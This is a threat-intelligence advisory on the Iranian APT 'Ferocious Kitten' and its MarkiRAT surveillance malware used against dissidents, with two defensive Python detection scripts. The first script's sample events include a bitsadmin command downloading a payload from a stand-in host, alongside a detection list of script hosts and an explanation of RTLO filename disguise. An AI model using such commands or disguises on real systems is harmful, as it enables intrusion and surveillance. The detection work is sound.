Iranian APT 'Ferocious Kitten' Continues to Target Dissidents With Custom MarkiRAT Surveillance Malware

Ferocious Kitten: Iranian APT Group's Ongoing Campaign Against Dissidents Using MarkiRAT Malware Detailed

HIGH
November 12, 2025

Executive Summary

New research from Picus Security has shed light on the ongoing operations of Ferocious Kitten, an Iranian advanced persistent threat (APT) group active since at least 2015. The group's primary mission is cyber-espionage, specifically targeting Iranian dissidents and activists. Their main tool is a custom-built remote access trojan (RAT) called MarkiRAT, which is delivered via spear-phishing campaigns. MarkiRAT is a potent surveillance tool designed for stealth and extensive data collection, featuring an intelligent keylogger, clipboard monitoring, and multiple defense evasion techniques. The group's sustained activity and specialized toolset demonstrate a dedicated, state-aligned effort to monitor and suppress political opposition.


Threat Overview

  • Threat Actor: Ferocious Kitten (APT-C-50)
  • Alignment: Iranian
  • Targets: Iranian dissidents, activists, and individuals of interest to the Iranian regime.
  • Malware: MarkiRAT, a custom RAT.
  • Primary Vector: Spear-phishing emails containing malicious Microsoft Office documents.

Ferocious Kitten's campaigns are highly targeted. They use social engineering to craft convincing lures, often disguising their malicious documents as political papers or other content relevant to their targets. This focused approach increases the likelihood of a successful compromise.


Technical Analysis

The attack chain employed by Ferocious Kitten is methodical and designed for stealth:

  1. Initial Access (T1566.001 - Spearphishing Attachment): The attack begins with a spear-phishing email carrying a malicious Microsoft Office document. The document is weaponized either with embedded macros (T1059.005 - Visual Basic) or by exploiting known vulnerabilities such as the MSHTML engine flaw (CVE-2021-40444).
  2. Execution & Deployment: Once the victim opens the document and enables content, the payload executes, downloading and installing the MarkiRAT malware.
  3. Surveillance & Data Collection: MarkiRAT provides the attackers with extensive surveillance capabilities:
    • Keystroke & Clipboard Logging (T1056.001 - Keylogging): The RAT includes an advanced logger that reportedly activates only when it detects that the victim is not using a password manager, which makes it harder to detect.
    • File & Data Collection (T1005 - Data from Local System): The malware can search for and exfiltrate specific files from the compromised system.
  4. Command and Control (T1071.001 - Web Protocols): MarkiRAT communicates with its C2 servers using standard HTTP and HTTPS GET/POST requests, which helps it blend in with normal web traffic.
  5. Defense Evasion & Persistence: Ferocious Kitten employs several techniques to remain undetected:
    • BITS Jobs (T1197 - BITS Jobs): Abusing the legitimate Windows Background Intelligent Transfer Service (BITS) to download payloads or exfiltrate data.
    • Right-to-Left Override (RTLO) (T1564.002 - Hide Files and Directories): Using the RTLO Unicode character to disguise a malicious executable's file extension (e.g., making file.exe appear as file.txt).
    • App Directory Takeovers: A persistence technique where the malware places itself in a location that will be executed by a legitimate application.
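The three endpoint-side behaviours above (an Office application spawning a script host, bitsadmin.exe being invoked, and a file name carrying the Right-to-Left Override character) are the ones a detection engineer would hunt for first. The script below is an added example, not code from Picus Security or the original report; it runs those checks over a handful of constructed process-creation events whose field names (parent_image, image, command_line) are assumed and only mimic a generic EDR/Sysmon record.

```python
"""Flag the endpoint TTPs described above in process-creation events:
an Office application spawning a script host, bitsadmin.exe being invoked,
and a file name that carries the Right-to-Left Override character (U+202E).

Added example, not code from Picus Security or the original report. The event
records are constructed for illustration; their field names (parent_image,
image, command_line) are assumed and only mimic a generic EDR/Sysmon record.
"""
import re

RTLO = "\u202e"
# Office parents that should not normally launch script or scripting hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {"powershell.exe", "mshta.exe", "cmd.exe", "wscript.exe",
                       "cscript.exe", "rundll32.exe", "regsvr32.exe"}


def basename(path):
    """Lower-cased file name portion of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def reveal_rtlo(name):
    """Show how an RTLO-laden name renders versus what Windows executes.

    Everything after U+202E is drawn right-to-left, so the name
    "report" + U+202E + "txt.exe" is displayed as "reportexe.txt" while the
    real extension is still .exe. Returns None when no RTLO is present.
    """
    if RTLO not in name:
        return None
    head, tail = name.split(RTLO, 1)
    true_ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return {"displayed_as": head + tail[::-1], "true_extension": true_ext}


def analyse_event(ev):
    """Return a list of finding strings for one process-creation event."""
    findings = []
    parent = basename(ev.get("parent_image", ""))
    image = basename(ev.get("image", ""))
    cmd = ev.get("command_line", "")

    if parent in OFFICE_PARENTS and image in SUSPICIOUS_CHILDREN:
        findings.append(f"office-child-process: {parent} -> {image}")

    if image == "bitsadmin.exe" or re.search(r"\bbitsadmin(\.exe)?\b", cmd, re.I):
        findings.append("bits-job-via-bitsadmin")

    rtlo = reveal_rtlo(image)
    if rtlo:
        findings.append(
            f"rtlo-filename: shown as {rtlo['displayed_as']!r}, "
            f"true extension .{rtlo['true_extension']}"
        )
    elif RTLO in cmd:
        findings.append("rtlo-in-command-line")
    return findings


def triage(events):
    """Map event index -> findings, keeping only events that raised something."""
    result = {}
    for i, ev in enumerate(events):
        findings = analyse_event(ev)
        if findings:
            result[i] = findings
    return result


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -File stage.ps1"},
    {"parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": "bitsadmin /transfer job /download http://host.invalid/update C:\\Users\\Public\\update.bin"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": "C:\\Users\\alice\\Downloads\\annual_report\u202etxt.exe",
     "command_line": "\"C:\\Users\\alice\\Downloads\\annual_report\u202etxt.exe\""},
    {"parent_image": r"C:\Windows\explorer.exe",  # benign: Word opened by the user
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "WINWORD.EXE /n"},
]

if __name__ == "__main__":
    for idx, found in triage(SAMPLE_EVENTS).items():
        print(idx, found)
```

The RTLO check deliberately looks at the file name Windows will actually load rather than at what the user sees, and it reports both views so an analyst can see why `annual_report...txt.exe` renders as a text file.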

Impact Assessment

The primary impact of Ferocious Kitten's operations is not financial but political and personal. For the targeted individuals:

  • Loss of Privacy: The comprehensive surveillance capabilities of MarkiRAT result in a total loss of privacy, with attackers able to monitor all communications and activities.
  • Physical Danger: For dissidents and activists, the information stolen by a state-aligned APT can lead to harassment, arrest, and physical harm.
  • Chilling Effect: The knowledge of such surveillance can create a climate of fear, suppressing free speech and political opposition.

IOCs

Specific IOCs (hashes, domains) were not provided in the source articles, but the malware family name is a key indicator.

Type             Value      Description
Malware Family   MarkiRAT   Custom RAT used by Ferocious Kitten.

Detection & Response

  1. EDR and Behavioral Analysis: Use an EDR solution to detect the TTPs used by Ferocious Kitten. Monitor for Office applications spawning suspicious child processes (e.g., powershell.exe, mshta.exe), the use of bitsadmin.exe, and files with the RTLO character. This aligns with D3FEND's Process Analysis.
  2. Network Traffic Analysis: Monitor outbound HTTP/S traffic for patterns indicative of C2 communications. Look for regular beacons to the same IP/domain, even if the traffic is encrypted.
  3. Email Security: Implement advanced email filtering to scan attachments for malicious macros and known exploits. Sandboxing attachments to observe their behavior before delivery is highly effective.
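Step 2 above asks for regular beacons to be spotted even when the traffic is encrypted; timing is the signal, not content. The script below is an added example, not code from Picus Security or the original report. It scores constructed proxy log lines (timestamp, source IP, method, URL, status, all made up here with .invalid hostnames) by how evenly spaced each source-to-host request series is; the log format and the jitter threshold are assumptions.

```python
"""Score outbound HTTP(S) requests for beacon-like regularity, the network
check in step 2 above: a host that is contacted repeatedly at nearly constant
intervals stands out even when the payload is encrypted.

Added example, not code from Picus Security or the original report. The proxy
log lines below are constructed (timestamp, source IP, method, URL, status)
and use .invalid hostnames; the format and thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev

LINE_RE = re.compile(
    r"^(\S+)\s+(\S+)\s+(GET|POST)\s+https?://([^/\s]+)\S*\s+(\d{3})$"
)


def parse_line(line):
    """Parse one constructed proxy log line into a dict, or None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, method, host, status = m.groups()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"when": when, "src": src, "method": method, "host": host, "status": int(status)}


def beacon_scores(lines, min_events=6):
    """Per (source, host) pair: request count, mean gap and jitter (coefficient
    of variation of the gaps). Many events with low jitter is beacon-like."""
    by_pair = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_pair[(rec["src"], rec["host"])].append(rec["when"])
    scores = {}
    for pair, times in by_pair.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        scores[pair] = {"count": len(times),
                        "mean_interval_s": round(avg, 1),
                        "jitter_cv": round(cv, 3)}
    return scores


def suspected_beacons(lines, max_cv=0.15, min_events=6):
    """(source, host) pairs whose timing jitter is at or below max_cv."""
    return sorted(pair for pair, s in beacon_scores(lines, min_events).items()
                  if s["jitter_cv"] <= max_cv)


# Constructed sample: one host polled every ~300 s with a few seconds of
# jitter, and one host browsed at irregular, human-paced intervals.
_BASE = datetime(2025, 11, 12, 9, 0, 0, tzinfo=timezone.utc)


def _line(offset_s, host, path, method="GET"):
    ts = (_BASE + timedelta(seconds=offset_s)).strftime("%Y-%m-%dT%H:%M:%SZ")
    return f"{ts} 10.0.0.5 {method} https://{host}{path} 200"


SAMPLE_LINES = (
    [_line(o, "updates.example.invalid", "/api/v1/ping")
     for o in (0, 300, 596, 900, 1199, 1500, 1797, 2100)]
    + [_line(o, "news.example.invalid", f"/story/{i}")
       for i, o in enumerate((5, 42, 46, 195, 605, 606, 905, 1705))]
    + ["malformed line that the parser skips"]
)

if __name__ == "__main__":
    for pair, score in beacon_scores(SAMPLE_LINES).items():
        print(pair, score)
    print("suspected beacons:", suspected_beacons(SAMPLE_LINES))
```

The coefficient of variation is used rather than raw standard deviation so that a 5-minute and a 5-second beacon are judged on the same scale; in practice the threshold should be tuned against known-good polling traffic (update checks, telemetry agents), which is also why a suspected pair should be triaged against an allow-list before it is acted on.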

Mitigation

  1. User Training (M1017 - User Training): Targeted individuals must be trained to be extremely cautious of unsolicited emails and attachments, even if they appear to come from a known contact.
  2. Attack Surface Reduction (ASR): Configure Microsoft Office to block macros from the internet and implement ASR rules to prevent common exploit delivery mechanisms.
  3. Endpoint Hardening: Disable or restrict scripting languages like PowerShell for standard users. Use application control to prevent the execution of unauthorized software.
  4. Software Updates (M1051 - Update Software): Keep operating systems and applications, especially Microsoft Office and web browsers, fully patched to prevent exploitation of known vulnerabilities.

Timeline of Events

  1. January 1, 2015: Ferocious Kitten APT group is believed to have been active since at least 2015.
  2. November 12, 2025: This article was published.

MITRE ATT&CK Mitigations

  • Training high-risk users to identify and report sophisticated spear-phishing attempts is a critical defense.
  • Use EDR to monitor for and block malicious behaviors like Office spawning shells or the abuse of BITSAdmin.
  • Harden Microsoft Office configurations to disable macros from the internet by default.
  • Implement egress filtering to restrict outbound connections to only what is necessary for business, potentially blocking C2 channels.

Article Author

Jason Gomes

• Cybersecurity Practitioner


Tags

APT, Ferocious Kitten, MarkiRAT, Iran, Cyber-espionage, Spear-phishing, Malware
